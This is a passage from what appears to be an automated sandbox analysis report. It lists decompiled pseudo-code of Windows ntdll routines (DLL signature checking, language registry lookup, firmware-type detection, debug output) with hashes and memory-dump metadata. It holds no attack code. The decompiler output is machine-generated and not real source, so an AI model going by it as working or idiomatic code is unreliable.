                                          							goto L5;
                                          						}
                                          						_t102 =  *0xef5780; // 0x0
                                          						if((_t102 & 0x00000003) != 0) {
                                          							E00E85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                          							_t102 =  *0xef5780; // 0x0
                                          						}
                                          						if((_t102 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          						_t124 = 0xc0000428;
                                          						goto L8;
                                          					}
                                          					L5:
                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                          						goto L8;
                                          					}
                                          					_t77 = _a4 - 0x40000003;
                                          					if(_t77 == 0 || _t77 == 0x33) {
                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                          						if(E00E27D50() != 0) {
                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						} else {
                                          							_t82 = 0x7ffe0384;
                                          						}
                                          						_t108 = 0x7ffe0385;
                                          						if( *_t82 != 0) {
                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E00E27D50() == 0) {
                                          									_t97 = 0x7ffe0385;
                                          								} else {
                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t97 & 0x00000020) != 0) {
                                          									E00E87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						if(_a4 != 0x40000003) {
                                          							L14:
                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                          							if(E00E27D50() != 0) {
                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          							} else {
                                          								_t87 = 0x7ffe0384;
                                          							}
                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                          								if(E00E27D50() != 0) {
                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          								}
                                          								if(( *_t108 & 0x00000020) != 0) {
                                          									E00E87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                          								}
                                          							}
                                          							goto L8;
                                          						} else {
                                          							_v16 = _t125 + 0x24;
                                          							_t124 = E00E3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                          							if(_t124 < 0) {
                                          								E00E0B1E1(_t124, 0x1490, 0, _v16);
                                          								goto L8;
                                          							}
                                          							goto L14;
                                          						}
                                          					} else {
                                          						goto L8;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          • minkernel\ntdll\ldrmap.c, xrefs: 00E698A2
                                          • LdrpCompleteMapModule, xrefs: 00E69898
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 00E69891
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: aa36d2cfe9fcc3edbb49918ab5db77b20c03b993c73d1dd68b12096ec15c1637
                                          • Instruction ID: 5a0320458921cf43a792d25c1366792836020a6a4e7813c36428d9aedf5a73e0
                                          • Opcode Fuzzy Hash: aa36d2cfe9fcc3edbb49918ab5db77b20c03b993c73d1dd68b12096ec15c1637
                                          • Instruction Fuzzy Hash: 755102316487409FD725CB58C844BAA7BF4BF41B58F24259AE891BB3D2C730ED80C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00E0E620(void* __ecx, short* __edx, short* _a4) {
                                          				char _v16;
                                          				char _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				void* _v56;
                                          				void* _v60;
                                          				char _v64;
                                          				void* _v68;
                                          				void* _v76;
                                          				void* _v84;
                                          				signed int _t59;
                                          				signed int _t74;
                                          				signed short* _t75;
                                          				signed int _t76;
                                          				signed short* _t78;
                                          				signed int _t83;
                                          				short* _t93;
                                          				signed short* _t94;
                                          				short* _t96;
                                          				void* _t97;
                                          				signed int _t99;
                                          				void* _t101;
                                          				void* _t102;
                                          
                                          				_t80 = __ecx;
                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                          				_t96 = __edx;
                                          				_v44 = __edx;
                                          				_t78 = 0;
                                          				_v56 = 0;
                                          				if(__ecx == 0 || __edx == 0) {
                                          					L28:
                                          					_t97 = 0xc000000d;
                                          				} else {
                                          					_t93 = _a4;
                                          					if(_t93 == 0) {
                                          						goto L28;
                                          					}
                                          					_t78 = E00E0F358(__ecx, 0xac);
                                          					if(_t78 == 0) {
                                          						_t97 = 0xc0000017;
                                          						L6:
                                          						if(_v56 != 0) {
                                          							_push(_v56);
                                          							E00E495D0();
                                          						}
                                          						if(_t78 != 0) {
                                          							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                          						}
                                          						return _t97;
                                          					}
                                          					E00E4FA60(_t78, 0, 0x158);
                                          					_v48 = _v48 & 0x00000000;
                                          					_t102 = _t101 + 0xc;
                                          					 *_t96 = 0;
                                          					 *_t93 = 0;
                                          					E00E4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                          					_v36 = 0x18;
                                          					_v28 =  &_v44;
                                          					_v64 = 0;
                                          					_push( &_v36);
                                          					_push(0x20019);
                                          					_v32 = 0;
                                          					_push( &_v64);
                                          					_v24 = 0x40;
                                          					_v20 = 0;
                                          					_v16 = 0;
                                          					_t97 = E00E49600();
                                          					if(_t97 < 0) {
                                          						goto L6;
                                          					}
                                          					E00E4BB40(0,  &_v36, L"InstallLanguageFallback");
                                          					_push(0);
                                          					_v48 = 4;
                                          					_t97 = L00E0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                          					if(_t97 >= 0) {
                                          						if(_v52 != 1) {
                                          							L17:
                                          							_t97 = 0xc0000001;
                                          							goto L6;
                                          						}
                                          						_t59 =  *_t78 & 0x0000ffff;
                                          						_t94 = _t78;
                                          						_t83 = _t59;
                                          						if(_t59 == 0) {
                                          							L19:
                                          							if(_t83 == 0) {
                                          								L23:
                                          								E00E4BB40(_t83, _t102 + 0x24, _t78);
                                          								if(L00E143C0( &_v48,  &_v64) == 0) {
                                          									goto L17;
                                          								}
                                          								_t84 = _v48;
                                          								 *_v48 = _v56;
                                          								if( *_t94 != 0) {
                                          									E00E4BB40(_t84, _t102 + 0x24, _t94);
                                          									if(L00E143C0( &_v48,  &_v64) != 0) {
                                          										 *_a4 = _v56;
                                          									} else {
                                          										_t97 = 0xc0000001;
                                          										 *_v48 = 0;
                                          									}
                                          								}
                                          								goto L6;
                                          							}
                                          							_t83 = _t83 & 0x0000ffff;
                                          							while(_t83 == 0x20) {
                                          								_t94 =  &(_t94[1]);
                                          								_t74 =  *_t94 & 0x0000ffff;
                                          								_t83 = _t74;
                                          								if(_t74 != 0) {
                                          									continue;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L23;
                                          						} else {
                                          							goto L14;
                                          						}
                                          						while(1) {
                                          							L14:
                                          							_t27 =  &(_t94[1]); // 0x2
                                          							_t75 = _t27;
                                          							if(_t83 == 0x2c) {
                                          								break;
                                          							}
                                          							_t94 = _t75;
                                          							_t76 =  *_t94 & 0x0000ffff;
                                          							_t83 = _t76;
                                          							if(_t76 != 0) {
                                          								continue;
                                          							}
                                          							goto L23;
                                          						}
                                          						 *_t94 = 0;
                                          						_t94 = _t75;
                                          						_t83 =  *_t75 & 0x0000ffff;
                                          						goto L19;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00E0E68C
                                          • @, xrefs: 00E0E6C0
                                          • InstallLanguageFallback, xrefs: 00E0E6DB
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 78e0b44552212c5c9673332f0ec4baf5fd2caea11975df5e16aeb450bcff1aad
                                          • Instruction ID: dc11aa3b339ee8dd4978dbedc51ac519c983f6956f903744714155b9185d25db
                                          • Opcode Fuzzy Hash: 78e0b44552212c5c9673332f0ec4baf5fd2caea11975df5e16aeb450bcff1aad
                                          • Instruction Fuzzy Hash: 0851CEB26087459BC710DF24D440AABB3E8BF88758F04196EF996F7241EB34DD84C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E00ECE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v40;
                                          				char _v44;
                                          				intOrPtr _v48;
                                          				signed int _v52;
                                          				unsigned int _v56;
                                          				char _v60;
                                          				signed int _v64;
                                          				char _v68;
                                          				signed int _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				char _t87;
                                          				signed int _t90;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				intOrPtr* _t113;
                                          				signed int _t122;
                                          				void* _t132;
                                          				void* _t135;
                                          				signed int _t139;
                                          				signed int* _t141;
                                          				signed int _t146;
                                          				signed int _t147;
                                          				void* _t153;
                                          				signed int _t155;
                                          				signed int _t159;
                                          				char _t166;
                                          				void* _t172;
                                          				void* _t176;
                                          				signed int _t177;
                                          				intOrPtr* _t179;
                                          
                                          				_t179 = __ecx;
                                          				_v48 = __edx;
                                          				_v68 = 0;
                                          				_v72 = 0;
                                          				_push(__ecx[1]);
                                          				_push( *__ecx);
                                          				_push(0);
                                          				_t153 = 0x14;
                                          				_t135 = _t153;
                                          				_t132 = E00ECBBBB(_t135, _t153);
                                          				if(_t132 == 0) {
                                          					_t166 = _v68;
                                          					goto L43;
                                          				} else {
                                          					_t155 = 0;
                                          					_v52 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v56 = __ecx[1];
                                          					if( *__ecx >> 8 < 2) {
                                          						_t155 = 1;
                                          						_v52 = 1;
                                          					}
                                          					_t139 = _a4;
                                          					_t87 = (_t155 << 0xc) + _t139;
                                          					_v60 = _t87;
                                          					if(_t87 < _t139) {
                                          						L11:
                                          						_t166 = _v68;
                                          						L12:
                                          						if(_t132 != 0) {
                                          							E00ECBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                          						}
                                          						L43:
                                          						if(_v72 != 0) {
                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                          							_push( *_t179);
                                          							_push(0x8000);
                                          							E00ECAFDE( &_v72,  &_v60);
                                          						}
                                          						L46:
                                          						return _t166;
                                          					}
                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                          					asm("sbb edi, edi");
                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                          					if(_t90 != 0) {
                                          						_push(0);
                                          						_push(0x14);
                                          						_push( &_v44);
                                          						_push(3);
                                          						_push(_t179);
                                          						_push(0xffffffff);
                                          						if(E00E49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                          							_push(_t139);
                                          							E00ECA80D(_t179, 1, _v40, 0);
                                          							_t172 = 4;
                                          						}
                                          					}
                                          					_t141 =  &_v72;
                                          					if(E00ECA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                          						_v64 = _a4;
                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                          						asm("sbb edi, edi");
                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                          						if(_t94 != 0) {
                                          							_push(0);
                                          							_push(0x14);
                                          							_push( &_v24);
                                          							_push(3);
                                          							_push(_t179);
                                          							_push(0xffffffff);
                                          							if(E00E49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                          								_push(_t141);
                                          								E00ECA80D(_t179, 1, _v20, 0);
                                          								_t176 = 4;
                                          							}
                                          						}
                                          						if(E00ECA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                          							goto L11;
                                          						} else {
                                          							_t177 = _v64;
                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                          							_t100 = _v52 + _v52;
                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                          							 *(_t132 + 0x10) = _t146;
                                          							asm("bsf eax, [esp+0x18]");
                                          							_v52 = _t100;
                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                          							_t47 =  &_a8;
                                          							 *_t47 = _a8 & 0x00000001;
                                          							if( *_t47 == 0) {
                                          								E00E22280(_t179 + 0x30, _t179 + 0x30);
                                          							}
                                          							_t147 =  *(_t179 + 0x34);
                                          							_t159 =  *(_t179 + 0x38) & 1;
                                          							_v68 = 0;
                                          							if(_t147 == 0) {
                                          								L35:
                                          								E00E1B090(_t179 + 0x34, _t147, _v68, _t132);
                                          								if(_a8 == 0) {
                                          									E00E1FFB0(_t132, _t177, _t179 + 0x30);
                                          								}
                                          								asm("lock xadd [eax], ecx");
                                          								asm("lock xadd [eax], edx");
                                          								_t132 = 0;
                                          								_v72 = _v72 & 0;
                                          								_v68 = _v72;
                                          								if(E00E27D50() == 0) {
                                          									_t113 = 0x7ffe0388;
                                          								} else {
                                          									_t177 = _v64;
                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          								}
                                          								if( *_t113 == _t132) {
                                          									_t166 = _v68;
                                          									goto L46;
                                          								} else {
                                          									_t166 = _v68;
                                          									E00EBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                          									goto L12;
                                          								}
                                          							} else {
                                          								L23:
                                          								while(1) {
                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                          										_t122 =  *_t147;
                                          										if(_t159 == 0) {
                                          											L32:
                                          											if(_t122 == 0) {
                                          												L34:
                                          												_v68 = 0;
                                          												goto L35;
                                          											}
                                          											L33:
                                          											_t147 = _t122;
                                          											continue;
                                          										}
                                          										if(_t122 == 0) {
                                          											goto L34;
                                          										}
                                          										_t122 = _t122 ^ _t147;
                                          										goto L32;
                                          									}
                                          									_t122 =  *(_t147 + 4);
                                          									if(_t159 == 0) {
                                          										L27:
                                          										if(_t122 != 0) {
                                          											goto L33;
                                          										}
                                          										L28:
                                          										_v68 = 1;
                                          										goto L35;
                                          									}
                                          									if(_t122 == 0) {
                                          										goto L28;
                                          									}
                                          									_t122 = _t122 ^ _t147;
                                          									goto L27;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_v72 = _v72 & 0x00000000;
                                          					goto L11;
                                          				}
                                          			}





































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: e648438fe4aed4442fa6407f470d0efb0405c01effa699f05d59e4d78947e15e
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: ED91C0322043419FE724CE25CA41F5BB7E5AF84718F18992EF595EB380D776E806CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00E851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed short* _t63;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				signed int _t67;
                                          				intOrPtr _t74;
                                          				intOrPtr _t84;
                                          				intOrPtr _t88;
                                          				intOrPtr _t94;
                                          				void* _t100;
                                          				void* _t103;
                                          				intOrPtr _t105;
                                          				signed int _t106;
                                          				short* _t108;
                                          				signed int _t110;
                                          				signed int _t113;
                                          				signed int* _t115;
                                          				signed short* _t117;
                                          				void* _t118;
                                          				void* _t119;
                                          
                                          				_push(0x80);
                                          				_push(0xee05f0);
                                          				E00E5D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                          				_t115 =  *(_t118 + 0xc);
                                          				 *(_t118 - 0x7c) = _t115;
                                          				 *((char*)(_t118 - 0x65)) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          				_t113 = 0;
                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                          				_t100 = __ecx;
                                          				if(_t100 == 0) {
                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          					E00E1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          					 *((char*)(_t118 - 0x65)) = 1;
                                          					_t63 =  *(_t118 - 0x90);
                                          					_t101 = _t63[2];
                                          					_t64 =  *_t63 & 0x0000ffff;
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					L20:
                                          					_t65 = _t64 >> 1;
                                          					L21:
                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                          					if(_t108 == 0) {
                                          						L27:
                                          						 *_t115 = _t65 + 1;
                                          						_t67 = 0xc0000023;
                                          						L28:
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                          						L29:
                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                          						E00E853CA(0);
                                          						return E00E5D130(0, _t113, _t115);
                                          					}
                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                          							 *_t108 = 0;
                                          						}
                                          						goto L27;
                                          					}
                                          					 *_t115 = _t65;
                                          					_t115 = _t65 + _t65;
                                          					E00E4F3E0(_t108, _t101, _t115);
                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                          					_t67 = 0;
                                          					goto L28;
                                          				}
                                          				_t103 = _t100 - 1;
                                          				if(_t103 == 0) {
                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                          					_t74 = E00E23690(1, _t117, 0xde1810, _t118 - 0x74);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                          					_t101 = _t117[2];
                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                          					if(_t74 < 0) {
                                          						_t64 =  *_t117 & 0x0000ffff;
                                          						_t115 =  *(_t118 - 0x7c);
                                          						goto L20;
                                          					}
                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                          					_t115 =  *(_t118 - 0x7c);
                                          					goto L21;
                                          				}
                                          				if(_t103 == 1) {
                                          					_t105 = 4;
                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                          					_push(_t118 - 0x70);
                                          					_push(0);
                                          					_push(0);
                                          					_push(_t105);
                                          					_push(_t118 - 0x78);
                                          					_push(0x6b);
                                          					 *((intOrPtr*)(_t118 - 0x64)) = E00E4AA90();
                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                          					_t113 = L00E24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                          					if(_t113 != 0) {
                                          						_push(_t118 - 0x70);
                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                          						_push(_t113);
                                          						_push(4);
                                          						_push(_t118 - 0x78);
                                          						_push(0x6b);
                                          						_t84 = E00E4AA90();
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                          						if(_t84 < 0) {
                                          							goto L29;
                                          						}
                                          						_t110 = 0;
                                          						_t106 = 0;
                                          						while(1) {
                                          							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                          							 *(_t118 - 0x88) = _t106;
                                          							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                          								break;
                                          							}
                                          							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                          							_t106 = _t106 + 1;
                                          						}
                                          						_t88 = E00E8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                          						_t119 = _t119 + 0x1c;
                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                          						if(_t88 < 0) {
                                          							goto L29;
                                          						}
                                          						_t101 = _t118 - 0x3c;
                                          						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                          						goto L21;
                                          					}
                                          					_t67 = 0xc0000017;
                                          					goto L28;
                                          				}
                                          				_push(0);
                                          				_push(0x20);
                                          				_push(_t118 - 0x60);
                                          				_push(0x5a);
                                          				_t94 = E00E49860();
                                          				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                          				if(_t94 < 0) {
                                          					goto L29;
                                          				}
                                          				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                          					_t101 = L"Legacy";
                                          					_push(6);
                                          				} else {
                                          					_t101 = L"UEFI";
                                          					_push(4);
                                          				}
                                          				_pop(_t65);
                                          				goto L21;
                                          			}






















                                          0x00e852dc
                                          0x00e852e1
                                          0x00000000
                                          0x00000000
                                          0x00e852e7
                                          0x00e852f4
                                          0x00000000
                                          0x00e852f4
                                          0x00e85270
                                          0x00000000
                                          0x00e85270
                                          0x00e851fc
                                          0x00e851fd
                                          0x00e85202
                                          0x00e85203
                                          0x00e85205
                                          0x00e8520a
                                          0x00e8520f
                                          0x00000000
                                          0x00000000
                                          0x00e8521b
                                          0x00e85226
                                          0x00e8522b
                                          0x00e8521d
                                          0x00e8521d
                                          0x00e85222
                                          0x00e85222
                                          0x00e8522d
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: b883e5f2eb44bf59f140b3f56059a0606466a50742a2ce53f86e6fc784774aea
                                          • Instruction ID: 3f9e9aecbac7025c0fa6401e2152b353badef53ef794a0c8a63d86fc77064afd
                                          • Opcode Fuzzy Hash: b883e5f2eb44bf59f140b3f56059a0606466a50742a2ce53f86e6fc784774aea
                                          • Instruction Fuzzy Hash: 9D518E72A40A189FDB25EFA8C880AADBBF8FF48740F14542DE54DFB251DA709D40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00E0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                          				signed int _t65;
                                          				signed short _t69;
                                          				intOrPtr _t70;
                                          				signed short _t85;
                                          				void* _t86;
                                          				signed short _t89;
                                          				signed short _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr* _t98;
                                          				signed short _t99;
                                          				signed short _t101;
                                          				void* _t102;
                                          				char* _t103;
                                          				signed short _t104;
                                          				intOrPtr* _t110;
                                          				void* _t111;
                                          				void* _t114;
                                          				intOrPtr* _t115;
                                          
                                          				_t109 = __esi;
                                          				_t108 = __edi;
                                          				_t106 = __edx;
                                          				_t95 = __ebx;
                                          				_push(0x90);
                                          				_push(0xedf7a8);
                                          				E00E5D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                          				if(__edx == 0xffffffff) {
                                          					L6:
                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                          					__eflags = _t65 & 0x00000002;
                                          					if((_t65 & 0x00000002) != 0) {
                                          						L3:
                                          						L4:
                                          						return E00E5D130(_t95, _t108, _t109);
                                          					}
                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                          					_t108 = 0;
                                          					_t109 = 0;
                                          					_t95 = 0;
                                          					__eflags = 0;
                                          					while(1) {
                                          						__eflags = _t95 - 0x200;
                                          						if(_t95 >= 0x200) {
                                          							break;
                                          						}
                                          						E00E4D000(0x80);
                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                          						_t108 = _t115;
                                          						_t95 = _t95 - 0xffffff80;
                                          						_t17 = _t114 - 4;
                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                          						__eflags =  *_t17;
                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t102 = _t110 + 1;
                                          						do {
                                          							_t85 =  *_t110;
                                          							_t110 = _t110 + 1;
                                          							__eflags = _t85;
                                          						} while (_t85 != 0);
                                          						_t111 = _t110 - _t102;
                                          						_t21 = _t95 - 1; // -129
                                          						_t86 = _t21;
                                          						__eflags = _t111 - _t86;
                                          						if(_t111 > _t86) {
                                          							_t111 = _t86;
                                          						}
                                          						E00E4F3E0(_t108, _t106, _t111);
                                          						_t115 = _t115 + 0xc;
                                          						_t103 = _t111 + _t108;
                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                          						_t89 = _t95 - _t111;
                                          						__eflags = _t89;
                                          						_push(0);
                                          						if(_t89 == 0) {
                                          							L15:
                                          							_t109 = 0xc000000d;
                                          							goto L16;
                                          						} else {
                                          							__eflags = _t89 - 0x7fffffff;
                                          							if(_t89 <= 0x7fffffff) {
                                          								L16:
                                          								 *(_t114 - 0x94) = _t109;
                                          								__eflags = _t109;
                                          								if(_t109 < 0) {
                                          									__eflags = _t89;
                                          									if(_t89 != 0) {
                                          										 *_t103 = 0;
                                          									}
                                          									L26:
                                          									 *(_t114 - 0xa0) = _t109;
                                          									 *(_t114 - 4) = 0xfffffffe;
                                          									__eflags = _t109;
                                          									if(_t109 >= 0) {
                                          										L31:
                                          										_t98 = _t108;
                                          										_t39 = _t98 + 1; // 0x1
                                          										_t106 = _t39;
                                          										do {
                                          											_t69 =  *_t98;
                                          											_t98 = _t98 + 1;
                                          											__eflags = _t69;
                                          										} while (_t69 != 0);
                                          										_t99 = _t98 - _t106;
                                          										__eflags = _t99;
                                          										L34:
                                          										_t70 =  *[fs:0x30];
                                          										__eflags =  *((char*)(_t70 + 2));
                                          										if( *((char*)(_t70 + 2)) != 0) {
                                          											L40:
                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                          											 *(_t114 - 4) = 1;
                                          											_push(_t114 - 0x74);
                                          											L00E5DEF0(_t99, _t106);
                                          											 *(_t114 - 4) = 0xfffffffe;
                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          											goto L3;
                                          										}
                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                          											goto L40;
                                          										}
                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                          										_push(_t99 & 0x0000ffff);
                                          										_push(_t108);
                                          										_push(1);
                                          										_t101 = E00E4B280();
                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                          											__eflags = _t101 - 0x80000003;
                                          											if(_t101 == 0x80000003) {
                                          												E00E4B7E0(1);
                                          												_t101 = 0;
                                          												__eflags = 0;
                                          											}
                                          										}
                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          										goto L4;
                                          									}
                                          									__eflags = _t109 - 0x80000005;
                                          									if(_t109 == 0x80000005) {
                                          										continue;
                                          									}
                                          									break;
                                          								}
                                          								 *(_t114 - 0x90) = 0;
                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
